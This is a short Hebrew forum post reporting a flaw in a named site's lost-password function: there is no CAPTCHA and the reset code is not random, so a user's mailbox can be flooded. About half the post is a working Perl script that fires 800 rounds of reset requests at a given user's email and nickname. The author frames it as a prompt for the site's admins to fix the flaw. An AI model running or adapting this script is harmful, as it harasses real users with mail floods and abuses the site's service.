יש באג קטנצ'יק פה באתר שנותן לספאמרים להציף את האימיילים של משתמשים רשומים במידה והוא משיג את האימייל והניק של משתמש.
בדרך כלל באתרים גדולים המערכת הזאת יותר הדוקה, פה ראיתי אותה כמשוחררת וגמישה להתקפות.
בדרך כלל צריך לכתוב סיסמאת אבטחה מתמונה ורק אז ניתן לקבל את הסיסמא לאימייל, פה אפשר להציף עם האימייל בעזרת סיסמא שנשלחת לאימייל בשביל לשחזר עם אותה סיסמא את הסיסמא לכניסה לאתר.(זה נשמע מסובך אבל זה לא)
דבר נוסף שדי גמיש הוא הסיסמא שנשלחת לאימייל בשביל לשחזר את הסיסמא של היוזר באתר.
היא לא רנדומלית לחלוטין היא משתנה פעם בכמה פעמים לא בידיוק בדקתי את זה אבל זה לא רנדומלי לחלוטין.
בכל אופן כתבתי קוד בפרל שעושה את זה :
קוד: |
#!/usr/bin/perl
#use strict;
use LWP::Simple;
# Flood WhatsUp.Org.il mails of register users - By Di42lo#
my $nick=$ARGV[0];
my $mail=$ARGV[1];
my $password="f04fa";
my $times=800;
my $loop;
$mail=s/@/%40/;
for ($loop; $loop<$times; $loop++)
{
my $url1="http://whatsup.org.il/user.php?uname=$nick\&email=$mail\&code=&op=mailpasswd\&module=NS-LostPassword";
my $url2="http://whatsup.org.il/user.php?uname=$nick\&email=$mail\&code=$password\&op=mailpasswd&module=NS-LostPassword";
my $url1_shit=get($url1);
my $url2_shit=get($url2);
#print $url1_shit; print $url2_shit;
}
|
יאלה אדמינים תתקנו